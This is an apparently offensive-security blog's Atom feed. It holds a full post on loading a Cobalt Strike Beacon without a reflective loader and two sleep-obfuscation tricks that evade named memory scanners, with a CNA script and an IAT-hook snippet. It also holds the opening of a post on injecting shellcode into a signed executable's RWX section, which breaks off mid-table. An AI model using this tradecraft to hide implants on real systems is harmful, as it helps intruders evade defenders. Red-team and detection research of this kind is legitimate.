<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.2.1">Jekyll</generator><link href="https://www.naksyn.com/atom.xml" rel="self" type="application/atom+xml" /><link href="https://www.naksyn.com/" rel="alternate" type="text/html" /><updated>2024-07-02T05:44:13-04:00</updated><id>https://www.naksyn.com/atom.xml</id><title type="html">Naksyn’s blog</title><subtitle>Red Teaming and offensive stuff</subtitle><author><name>Naksyn</name></author><entry><title type="html">Raising Beacons without UDRLs and Teaching them How to Sleep</title><link href="https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep.html" rel="alternate" type="text/html" title="Raising Beacons without UDRLs and Teaching them How to Sleep" /><published>2024-07-02T00:00:00-04:00</published><updated>2024-07-01T17:10:20-04:00</updated><id>https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep</id><content type="html" xml:base="https://www.naksyn.com/cobalt%20strike/2024/07/02/raising-beacons-without-UDRLs-teaching-how-to-sleep.html"><![CDATA[<p><img src="/images/pidgeon.png" alt="image-center" title="Technique description" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#udrl-less-beacon-generation" id="markdown-toc-udrl-less-beacon-generation">UDRL-less Beacon generation</a></li>
  <li><a href="#udrl-less-beacon-loading" id="markdown-toc-udrl-less-beacon-loading">UDRL-less Beacon loading</a></li>
  <li><a href="#hook-sleep-and-prototype-stuff" id="markdown-toc-hook-sleep-and-prototype-stuff">Hook Sleep and prototype stuff</a>    <ol>
      <li><a href="#poc--gtfo-1" id="markdown-toc-poc--gtfo-1">PoC || GTFO #1</a></li>
    </ol>
  </li>
  <li><a href="#memmory-bouncing" id="markdown-toc-memmory-bouncing">Memory Bouncing</a>    <ol>
      <li><a href="#poc--gtfo-2" id="markdown-toc-poc--gtfo-2">PoC || GTFO #2</a></li>
    </ol>
  </li>
  <li><a href="#memory-hopping" id="markdown-toc-memory-hopping">Memory Hopping</a>    <ol>
      <li><a href="#poc--gtfo-3" id="markdown-toc-poc--gtfo-3">PoC || GTFO #3</a></li>
    </ol>
  </li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<h3 id="tldr">TL;DR</h3>

<p>This journey started because I wanted a simpler way than a Beacon UDRL to experiment with sleep obfuscation techniques.</p>

<p>It turned out that, by creating a raw UDRL-less Cobalt Strike Beacon with a specific CNA script, one can use a generic PE loader to execute it by calling the EntryPoint twice, with the second call using a specific dwReason value that triggers an undocumented DllMain execution path.</p>

<p>This allowed a direct IAT Sleep hook on the Beacon and a quicker way to prototype two techniques, dubbed <strong>MemoryBouncing</strong> and <strong>MemoryHopping</strong>, to overcome Elastic’s <a href="https://github.com/jdu2600/EtwTi-FluctuationMonitor">EtwTI-FluctuationMonitor</a> tool, which bakes in a detection for sleep obfuscation techniques that routinely change permissions from RX to RW.</p>

<p>MemoryBouncing is a Sleep obfuscation technique that avoids RX -&gt; RW detection by saving an encrypted copy of the PE, freeing the PE memory while sleeping and allocating it again as RWX before resuming execution.
This technique made it possible to operate a UDRL-less Beacon without being detected by the tools <a href="https://github.com/jdu2600/EtwTi-FluctuationMonitor">EtwTI-FluctuationMonitor</a>, <a href="https://github.com/jdu2600/CFG-FindHiddenShellcode">CFG-FindHiddenShellcode</a>, <a href="https://github.com/forrest-orr/moneta">Moneta</a> and the latest release (to date) of <a href="https://github.com/hasherezade/pe-sieve">PE-Sieve</a> with aggressive scan options.</p>

<p>The MemoryHopping technique always allocates RWX memory at a different address, which requires adjusting the return address and remapping and relocating the PE at each hooked sleep call.
With this technique the payload must not hold cross-memory references; otherwise an execution exception is raised after the memory hop, because the referenced memory address has been freed.</p>

<p>The PoCs for the techniques are included in the <a href="https://github.com/naksyn/DojoLoader">DojoLoader</a> project, available on my GitHub, which can be useful to quickly prototype and test Sleep obfuscation techniques.</p>

<h3 id="intro">Intro</h3>

<p>UDRLs with Beacon are very powerful and allow for the smallest memory footprint for the running Beacon. However, they come with some disadvantages: development is more complex since UDRLs require Position Independent Code, and debugging can be so challenging it might feel like it ages you decades.
Starting from Cobalt Strike 4.9.1, a new feature allows Beacon to be exported without a UDRL. However, <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">in this blogpost</a> one can read:
<strong>“[this feature brings] the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs”.</strong></p>

<p class="notice--warning"><strong>What about non-prepend style UDRLs like a generic PE loader?</strong></p>
<p>Even though I might not get official support for generic PE loaders (why not though?), and even granting that UDRLs are better operational tools, it sounded like a nice capability to have at hand.</p>

<p>As per my current understanding, the following are the pros and cons of using UDRLs and generic PE loaders to load a Beacon:</p>

<p>UDRLs:</p>
<ul>
  <li>PRO: Smallest malicious memory footprint - all malicious code can be encrypted</li>
  <li>PRO: Best usage for process injection (shellcode blob one can just execute)</li>
  <li>CON: increased development complexity</li>
  <li>CON: increased debugging complexity</li>
  <li>CON: size constraints</li>
  <li>CON: reliance on dedicated thread to execute Beacon, asynchronous calls and timer queues to perform sleep obfuscation operations.</li>
</ul>

<p>Generic PE Loaders:</p>
<ul>
  <li>PRO: Simplified development and debugging</li>
  <li>PRO: can do a broader range of sleep obfuscation operations because the loader can access Beacon’s memory directly.</li>
  <li>PRO: no size limit</li>
  <li>PRO: can avoid creating new thread to run the beacon</li>
  <li>CON: Bigger malicious memory footprint - Beacon can be encrypted but PE loading code cannot be encrypted as easily</li>
  <li>CON: far less suitable for injection than shellcode</li>
</ul>

<p>The higher number of PROs for PE loaders does not mean they are better for stealth operations than UDRLs, but PE loaders can still have use cases.</p>

<p>To my knowledge, before Cobalt Strike version 4.9.1 it wasn’t possible to export a Beacon without bringing its own stock loader. This means that the “Stageless Windows Payload” generated in raw format is essentially a DLL that will in turn load Beacon once executed. We’ll refer to that as the “stock raw beacon payload” within this blogpost.
Loading the stock raw beacon payload leaves lots of artifacts in memory (see picture below), and one way to avoid that is to use custom UDRLs.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/stock_beacon_moneta.png" alt="image-center" title="some artifacts left by a stock Beacon" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output for a stock beacon</em></td>
    </tr>
  </tbody>
</table>

<p>Indeed, UDRLs make it possible to get rid of the stock loader and also allow dynamic IAT hooking for sleep obfuscation and other evasive techniques, without using the SleepMask.</p>

<p>Doing dynamic IAT hooking while loading the stock raw Beacon payload <strong>will not hook the sleep API of the real Beacon</strong>, because its imports will be resolved by the “internal” loader embedded in the DLL, not by the loader that you use to inject the stock beacon DLL.
This issue is described in the <a href="https://github.com/mgeeky/ShellcodeFluctuation">shellcode fluctuation project</a> by Mariusz Banach (mgeeky), where he had to hook the Sleep API inside kernel32.dll itself, instead of doing it dynamically, to effectively intercept the Beacon sleep calls as they hit kernel32.dll.</p>

<p>However, from version 4.9.1 onwards one can export a Beacon without a UDRL, get rid of the stock loader artifacts left in memory and dynamically hook the APIs imported by the raw Beacon, e.g. to implement obfuscation without a SleepMask.
We can also avoid creating a new thread and live on the loader’s main thread.</p>

<h3 id="udrl-less-beacon-generation">UDRL-less Beacon generation</h3>

<p>I won’t try to explain how UDRLs work since there are amazing blog posts available <a href="https://securityintelligence.com/x-force/defining-cobalt-strike-reflective-loader/">here</a> and <a href="https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-1-simplifying-development">here</a>,
so please have a look at them if you need a refresher.
Essentially, I needed a Beacon that is not “wrapped” by a UDRL so that I could directly hook API calls from the payload after mapping it in memory.
I couldn’t get the CNA snippet from the <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Fortra blogpost</a> to generate a UDRL-less Beacon, so after a bit of sifting through the Cobalt Strike documentation and some failed attempts I came up with this CNA:</p>

<pre><code class="language-sleep"># ------------------------------------
# BEACON_RDLL_SIZE
# $1 = DLL filename
# $2 = arch
# ------------------------------------

set BEACON_RDLL_SIZE {
    warn("Running 'BEACON_RDLL_SIZE' for DLL " . $1 . " with architecture " . $2);
    # "0" requests a Beacon without reflective loader space
    return "0";
}

# ------------------------------------
# BEACON_RDLL_GENERATE
# $1 = DLL filename
# $2 = Beacon DLL content
# $3 = arch
# ------------------------------------

set BEACON_RDLL_GENERATE {
    local('$arch $beacon');
    $beacon = $2;
    $arch = $3;

    # Apply the transformations to the beacon payload
    $beacon = setup_transformations($beacon, $arch);

    return $beacon;
}
</code></pre>

<p>After loading this CNA and generating a payload (Payloads -&gt; Windows Stageless Payloads -&gt; Output:Raw) we can see the differences from the stock payload in the following figures:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/stock_Beacon_cff.png" alt="image-center" title="Stock Beacon payload generated without noRL CNA" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>stageless stock Beacon payload generated without cna</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/Beacon_noRL_cff.png" alt="image-center" title="Beacon without UDRL" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>imports of a Beacon without UDRL</em></td>
    </tr>
  </tbody>
</table>

<p>We can see that the stock Beacon payload isn’t even parsed as a valid PE because it is essentially a blob of position-independent code that initializes and runs the Beacon payload.
On the other hand, the payload generated with our CNA script gives us a valid PE with some interesting imports such as WinHTTP.
Indeed, WinHTTP is the library chosen as the HTTP library during payload generation, and the fact that it’s included as an import entry is a sign that we are dealing with the Beacon payload unwrapped from its UDRL.</p>

<h3 id="udrl-less-beacon-loading">UDRL-less Beacon loading</h3>

<p>After initially failing to load the UDRL-less Beacon payload for no apparent reason, I began investigating what was going on. What I found is that there are essentially two different execution paths, triggered by calling the DLL entrypoint with <code class="language-plaintext highlighter-rouge">fdwReason</code> value 1 (DLL_PROCESS_ATTACH) and 4 respectively.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/noRL_dllmain_paths.png" alt="image-center" title="DllMain execution paths" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>UDRL-less Beacon Dllmain execution paths</em></td>
    </tr>
  </tbody>
</table>

<p>The execution branches that the flow takes when using <code class="language-plaintext highlighter-rouge">fdwReason</code> 1 or 4 lead to subroutines starting at address <code class="language-plaintext highlighter-rouge">0x1800CA74</code> and <code class="language-plaintext highlighter-rouge">0x18001A580</code> respectively.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/fdwReason_paths.png" alt="image-center" title="different subroutines called if different fdwReason value is used" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>different subroutines called if different fdwReason value is used</em></td>
    </tr>
  </tbody>
</table>

<p>It’s now clear that the UDRL-less Beacon should be loaded by calling the entrypoint using fdwReason 1 <strong>and</strong> 4, but in which order? And what are the subroutines actually doing?</p>

<p>After some debugging I found that the subroutine starting at <code class="language-plaintext highlighter-rouge">0x1800CA74</code> is responsible for single-byte XORing the 0x1800 bytes of Beacon configuration.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/beacon_configs_xor.png" alt="image-center" title="xor cycle applied to 0x1800 bytes configuration" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>subroutine responsible for config singlebyte-xoring called after using fdwReason 1</em></td>
    </tr>
  </tbody>
</table>
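
<p>As a rough illustration of what a single-byte XOR pass over a fixed-size buffer looks like, here is a minimal Python sketch. The key value and the sample content are made up for the example and are not taken from Beacon; only the 0x1800 size comes from the analysis above.</p>

<pre><code class="language-python">def xor_single_byte(data, key):
    """Return a copy of data with every byte XORed against one key byte."""
    return bytes(b ^ key for b in data)


CONFIG_SIZE = 0x1800  # buffer size mentioned in the post
KEY = 0x5A            # hypothetical key, chosen only for this example

# Placeholder content padded to the full buffer size
plain = b"example-setting".ljust(CONFIG_SIZE, b"\x00")

masked = xor_single_byte(plain, KEY)      # what would sit in the file
restored = xor_single_byte(masked, KEY)   # XOR is its own inverse
</code></pre>

<p>Since XOR with the same byte is its own inverse, the same routine both masks and unmasks the buffer, which is why a single loop in the DllMain path is enough to get cleartext settings.</p>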

<p>On the other hand, the subroutine starting at <code class="language-plaintext highlighter-rouge">0x18001A580</code> contains a function block at <code class="language-plaintext highlighter-rouge">0x18000CD44</code> that gets hit once the sleep time has elapsed, in order to reach the C2 set in the Malleable profile.
This subroutine uses some of the configuration parameters that are in cleartext only after the single-byte XOR has been applied by the subroutine at <code class="language-plaintext highlighter-rouge">0x1800CA74</code>.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/bacon_noRL_polling.png" alt="image-center" title="C2 polling routine" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>one of the subroutines responsible for C2 polling</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/beacon_noRL_polling_configs.png" alt="image-center" title="Beacon decrypted configs used in the routine" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Decrypted Beacon configs used in the routine at address 0x18000CD44</em></td>
    </tr>
  </tbody>
</table>

<p>It is now clear that in order to successfully load a UDRL-less Beacon we should call the <code class="language-plaintext highlighter-rouge">DllMain</code> entrypoint so that the configuration first gets decrypted (<code class="language-plaintext highlighter-rouge">fdwReason</code> 1) and is subsequently used to poll the C2 (<code class="language-plaintext highlighter-rouge">fdwReason</code> 4).
Including this logic in a generic PE loader that uses MemoryModule to map the DLL in memory and execute it will allow us to map the UDRL-less Beacon payload.</p>

<h3 id="hook-sleep-and-prototype-stuff">Hook Sleep and prototype stuff</h3>

<p>In order to load a UDRL-less Beacon I created the <a href="https://github.com/naksyn/DojoLoader">DojoLoader</a> project. It is a generic PE loader that you can also use to prototype sleep obfuscation, as covered later in the post.</p>

<p>DojoLoader uses the MemoryModule implementation of the <a href="https://gitlab.com/ORCA000/dynamicdllloader">DynamicDllLoader project by ORCA000</a>. I added modularity and some features like:</p>

<ol>
  <li>download and execution of (xored) shellcode from HTTP</li>
  <li>dynamic IAT hooking for Sleep function</li>
  <li>three different Sleep obfuscation techniques implemented in the hook library</li>
</ol>

<p>Executing a UDRL-less beacon by itself is not very useful if you’re not trying to hide a little bit. 
However, we are now resolving dynamically the imports of a UDRL-less beacon so we can hook the Sleep function used by the Beacon and apply our obfuscation techniques.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">PIMAGE_IMPORT_BY_NAME</span> <span class="n">thunkData</span> <span class="o">=</span> <span class="n">MakePointer</span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">,</span> <span class="n">pMemModule</span><span class="o">-&gt;</span><span class="n">lpBase</span><span class="p">,</span> <span class="p">(</span><span class="o">*</span><span class="n">thunkRef</span><span class="p">));</span>
                <span class="o">*</span><span class="n">funcRef</span> <span class="o">=</span> <span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hMod</span><span class="p">,</span> <span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">);</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Function Name: %s, Address: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">,</span> <span class="o">*</span><span class="n">funcRef</span><span class="p">);</span>

                <span class="c1">// Check if the function should be hooked</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">Configs</span><span class="p">.</span><span class="n">SleepHookFunc</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                    <span class="k">if</span> <span class="p">(</span><span class="n">check_hook</span><span class="p">((</span><span class="n">LPCSTR</span><span class="p">)</span><span class="o">&amp;</span><span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">))</span> <span class="p">{</span>
                        <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Hooking function: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">thunkData</span><span class="o">-&gt;</span><span class="n">Name</span><span class="p">);</span>
                        <span class="o">*</span><span class="n">funcRef</span> <span class="o">=</span> <span class="n">Configs</span><span class="p">.</span><span class="n">SleepHookFunc</span><span class="p">;</span>
                    <span class="p">}</span>
</code></pre></div></div>

<p>After applying a simple <em>RW -&gt; encrypt -&gt; Sleep -&gt; decrypt -&gt; RX</em> scheme as our sleep obfuscation we should have no artifacts shown by Moneta.
Indeed, Moneta does not alert on memory anomalies. However, this “old” technique cannot get past the latest PE-Sieve and EtwTI-FluctuationMonitor.</p>

<h4 id="poc--gtfo-1">PoC || GTFO #1</h4>

<p>Here’s a video using DojoLoader to load a UDRL-less Beacon payload, hooking Sleep and applying a <em>RW -&gt; encrypt -&gt; Sleep -&gt; decrypt -&gt; RX</em> sleep obfuscation scheme:</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/RWRX.mp4" type="video/mp4" />
</video>

<h3 id="memmory-bouncing">Memory Bouncing</h3>

<p>I find DojoLoader useful to prototype and test sleep obfuscation techniques directly on a UDRL-less Beacon, so I thought about a couple of ways to circumvent EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode.</p>

<p>John Uhlmann (<a href="https://twitter.com/jdu2600">@jdu2600</a>) in his <a href="https://www.youtube.com/watch?v=WpzVhCOcIAc">Black Hat Asia presentation</a> hinted that one could potentially jump to a new location every time to circumvent the EtwTI-FluctuationMonitor detection.
<a href="https://www.x.com/shubakki">@shubakki</a> in their <a href="https://sillywa.re/posts/flower-da-flowin-shc/">blogpost</a> also describes a clever way to circumvent the detection by behaving like proper JIT memory: <em>Allocate(RW) -&gt; memcpy(code) -&gt; Protect(RX) -&gt; execute [-&gt; Free]</em>.</p>

<p>To me, one of the simplest Sleep hook functions that could avoid the RX -&gt; RW detection does the following:</p>

<ol>
  <li>Copy the mapped PE to a buffer and encrypt it</li>
  <li>Free the memory of the mapped PE</li>
  <li>Sleep for the requested time (e.g. SleepEx)</li>
  <li>Allocate RWX memory at the same address where the PE was mapped</li>
  <li>Decrypt the buffer and copy it over the RWX memory</li>
</ol>

<p>I like to call this technique <strong>MemoryBouncing</strong> and although it might not be the stealthiest chain because of the RWX allocation, it avoids using VirtualProtect altogether, so YMMV.
Interestingly, this technique made it possible to operate a UDRL-less Beacon undetected by the tools EtwTI-FluctuationMonitor, CFG-FindHiddenShellcode, Moneta and the latest release (to date) of PE-Sieve with aggressive scan options.
Even though DojoLoader does not yet include stack spoofing techniques, the return address on the stack would point to an invalid address if inspected while sleeping, because the PE memory has been freed.</p>
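
<p>To make the reasoning concrete, here is a deliberately simplified Python model of a detector that only counts RX -&gt; RW protection changes per region. It is a toy under stated assumptions: the event tuples, the operation names and the counting rule are hypothetical and do not reproduce how EtwTI-FluctuationMonitor or any real scanner works.</p>

<pre><code class="language-python">RX, RW, RWX = "RX", "RW", "RWX"
BASE = 0x180000000  # hypothetical base address of the mapped PE


def count_rx_to_rw_flips(events):
    """Count RX to RW protection changes per base address.

    events is a list of (op, base, protection) tuples where op is
    "alloc", "free" or "protect" (a made-up event format).
    """
    current = {}  # base address to current protection
    flips = {}    # base address to number of RX to RW changes
    for op, base, prot in events:
        if op == "alloc":
            current[base] = prot
        elif op == "free":
            current.pop(base, None)
        elif op == "protect":
            if current.get(base) == RX and prot == RW:
                flips[base] = flips.get(base, 0) + 1
            current[base] = prot
    return flips


# Classic scheme: flip to RW before sleeping, back to RX afterwards
classic_cycle = [("protect", BASE, RW), ("protect", BASE, RX)]
# Bouncing scheme: free before sleeping, allocate RWX again afterwards
bouncing_cycle = [("free", BASE, None), ("alloc", BASE, RWX)]

classic = [("alloc", BASE, RX)] + classic_cycle * 3
bouncing = [("alloc", BASE, RWX)] + bouncing_cycle * 3

classic_flips = count_rx_to_rw_flips(classic)
bouncing_flips = count_rx_to_rw_flips(bouncing)
</code></pre>

<p>In this model the classic scheme produces one flip per sleep cycle, while the bouncing sequence never produces a protection change at all. The trade-off is equally visible: every cycle leaves an RWX allocation behind, which other heuristics may well flag.</p>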

<h4 id="poc--gtfo-2">PoC || GTFO #2</h4>

<p>Here’s a video showing MemoryBouncing using a UDRL-less Beacon payload against EtwTI-FluctuationMonitor and CFG-FindHiddenShellcode (the scan was pretty lengthy):</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/membounce.mp4" type="video/mp4" />
</video>

<h3 id="memory-hopping">Memory Hopping</h3>

<p>Another approach to circumvent RX -&gt; RW detection would be, as <a href="https://twitter.com/jdu2600">@jdu2600</a> hinted in his presentation, to always allocate RWX memory at a different address, but in this case there are some things to take into consideration:</p>

<ol>
  <li>since we’re not dealing with shellcode or PIC, PE relocations need to be recalculated at each change of memory.</li>
  <li>the return address also needs to be adjusted at each change.</li>
  <li>payload memory allocations would need to be hooked to deal with the issues of always moving in memory (broken pointer references), unless the payload is natively compatible with this technique.</li>
</ol>

<p>After the hook is hit this technique will perform the following steps:</p>

<ol>
  <li>save the return address</li>
  <li>copy the mapped PE bytes to a buffer and optionally encrypt them</li>
  <li>free the memory of the mapped payload</li>
  <li>allocate RWX memory at a different address</li>
  <li>calculate the delta and adjust the return address accordingly</li>
  <li>copy the bytes from the buffer to the newly created memory region</li>
  <li>perform relocations on the copied bytes</li>
  <li>resume execution from the adjusted return address</li>
</ol>
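
<p>The address arithmetic behind the delta, return address and relocation steps can be sketched in a few lines of Python. This is only an illustration of the math: the base addresses, offsets and helper names are hypothetical, and the sketch does not parse a real relocation table or touch process memory.</p>

<pre><code class="language-python">def rebase_address(addr, old_base, new_base):
    """Translate an absolute address from the old mapping into the new one."""
    return addr - old_base + new_base


def apply_pointer_fixups(image, offsets, delta):
    """Add delta to each 8-byte little-endian pointer stored at the given offsets."""
    patched = bytearray(image)
    for off in offsets:
        value = int.from_bytes(patched[off:off + 8], "little")
        patched[off:off + 8] = ((value + delta) % 2**64).to_bytes(8, "little")
    return bytes(patched)


OLD_BASE = 0x180000000  # hypothetical address of the previous mapping
NEW_BASE = 0x190000000  # hypothetical address of the new mapping
delta = NEW_BASE - OLD_BASE

# Return address saved when the hook was hit, moved into the new mapping
saved_return = OLD_BASE + 0x1A5C0
new_return = rebase_address(saved_return, OLD_BASE, NEW_BASE)

# Tiny fake image holding one absolute pointer at offset 8
image = bytearray(16)
image[8:16] = (OLD_BASE + 0x2000).to_bytes(8, "little")
patched = apply_pointer_fixups(bytes(image), [8], delta)
fixed_pointer = int.from_bytes(patched[8:16], "little")
</code></pre>

<p>The same delta is applied to the return address and to every pointer listed for fixup, which is why a pointer that lives outside the image (for example on the payload’s heap) and is not covered by the relocation data ends up dangling after a hop.</p>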

<h4 id="poc--gtfo-3">PoC || GTFO #3</h4>

<p>I dubbed this technique <em>MemoryHopping</em> and as a PoC I used a test program that connects via socket, prints via stdout and sleeps.
In the following video we can see how DojoLoader hooks the Sleep function and remaps the PE at a new address (linearly incremented) every time the hook is hit, properly adjusting the return address before resuming execution.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/memhop.mp4" type="video/mp4" />
</video>

<h3 id="outro">Outro</h3>

<p>RX-&gt;RW detections can detect a wide range of sleep obfuscation techniques and attackers need to find more creative ways to hide a beacon in memory while sleeping.
This post described an attempt in that direction using a generic PE loader to quickly prototype and test ideas that can then be further improved and engineered if deemed worthy.</p>]]></content><author><name>Naksyn</name></author><category term="Cobalt Strike" /><category term="evasion" /><category term="redteam" /><category term="injection" /><summary type="html"><![CDATA[UDRLs and prepended loaders aren't the only way to execute a raw payload and get direct hooking in place. In the case of Cobalt Strike, a generic PE loader can be tweaked to execute a UDRL-less Beacon and get direct hooking for easier prototyping of Sleep obfuscation techniques. Using this approach, two techniques that bypass Elastic's RX -> RW Sleep detection, along with a few other scanners, are then demonstrated.]]></summary></entry><entry><title type="html">Mockingjay revisited - Process stomping and loading beacon with sRDI</title><link href="https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html" rel="alternate" type="text/html" title="Mockingjay revisited - Process stomping and loading beacon with sRDI" /><published>2023-11-18T00:00:00-05:00</published><updated>2023-06-03T17:10:20-04:00</updated><id>https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html"><![CDATA[<p><img src="/images/monkeyjay.PNG" alt="image-center" title="Mojo Monkeyjay" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#credits" id="markdown-toc-credits">Credits</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#process-stomping" id="markdown-toc-process-stomping">Process Stomping</a></li>
  <li><a href="#using-srdi-to-load-a-beacon-on-an-rwx-process-section" id="markdown-toc-using-srdi-to-load-a-beacon-on-an-rwx-process-section">using sRDI to load a Beacon on an RWX process’ section</a></li>
  <li><a href="#putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping" id="markdown-toc-putting-it-all-together-srdi--reflective-loaderless-beacon--process-stomping">Putting it all together: sRDI — Reflective-Loaderless Beacon — Process Stomping</a></li>
  <li><a href="#outro" id="markdown-toc-outro">Outro</a></li>
</ol>

</div>

<h3 id="tldr">TL;DR</h3>

<p>The <a href="https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution">original Mockingjay technique</a> abuses DLLs with RWX sections to obtain a stealthier way to inject malicious code, basically by avoiding dynamic memory allocation and the use of VirtualProtect, since RWX is already what we need.
The same reasoning can be applied also to executables with RWX sections because we can:</p>

<ol>
  <li>start the executable in a suspended state.</li>
  <li>write some shellcode on the RWX section.</li>
  <li>resume the thread on the desired entry point.</li>
</ol>

<p>This technique, dubbed Process Stomping, is a variation of hasherezade’s <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a> and it has the advantage of writing a shellcode payload on a targeted section instead of writing a whole PE payload over the hosting process address space.</p>

<p>We fell in love with DoublePulsar in 2017 so we wanted to use sRDI with a Reflective-Loaderless payload as shellcode.
For this reason we used the recent <a href="https://www.cobaltstrike.com/blog/cobalt-strike-49-take-me-to-your-loader">Cobalt Strike 4.9 feature</a> that allows the generation of a Beacon without a reflective loader and we modified the <a href="https://github.com/monoxgas/sRDI">sRDI</a> project to generate shellcode that will in turn bootstrap the reflective loading of Beacon <strong>on the RWX region of the stomped executable</strong>.</p>

<p>We tested the injection on a GlassWire executable (x86) that has a section called .themida with RWX permissions, and as a final result we got the process running with an injected Beacon living in the RWX memory range.
This is not a vulnerability on GlassWire’s side, since any executable with an RWX section and enough space to host a Beacon would be a good fit.</p>

<p>The technique’s PoC <a href="https://github.com/naksyn/ProcessStomping">can be found on my GitHub</a>, along with the lightly adapted sRDI project used.</p>

<h3 id="credits">Credits</h3>

<p>A huge thank you to:</p>
<ul>
  <li>Aleksandra Doniec (@hasherezade) for <a href="https://github.com/hasherezade/process_overwriting">Process Overwriting</a></li>
  <li>Nick Landers for <a href="https://github.com/monoxgas/sRDI">sRDI</a></li>
</ul>

<h3 id="intro">Intro</h3>

<p>Poking around with Moneta, I stumbled upon a strange behaviour exhibited by <a href="https://www.glasswire.com/">GlassWire</a>, a tool I often use because I find it very useful for spotting anomalies and infections.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/glasswire_moneta.png" alt="image-center" title="GlassWire x86 executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Moneta output for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<p>As can be seen in the picture, the GlassWire executable has a section named .themida, which immediately brought to mind the famous <a href="https://www.oreans.com/Themida.php">packer</a>.
The section has a size of around 7600 kB and RWX permissions.</p>

<p class="notice--info"><strong>The key element here is that Moneta is alerting on “modified code” for the .themida section across its entire size. This is expected behaviour for packers and the like, since the on-disk content of a packed binary is totally different from its content once unpacked in memory.</strong></p>

<p>This would be a perfect spot to hide in, since Moneta will alert on this exact same behaviour for every GlassWire binary.
Notably, there’s also a 64 kB RWX private commit and, as a cherry on top, the executable is 32-bit and signed.
Double-checking with ProcessHacker and PEBear confirmed the finding.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/PH_glasswire.png" alt="image-center" title="ProcessHacker Memory view for GlassWire executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>ProcessHacker Memory view for GlassWire executable</em></td>
    </tr>
  </tbody>
</table>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/pebear_glasswire.png" alt="image-center" title="PEbear section view for GlassWire executable" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
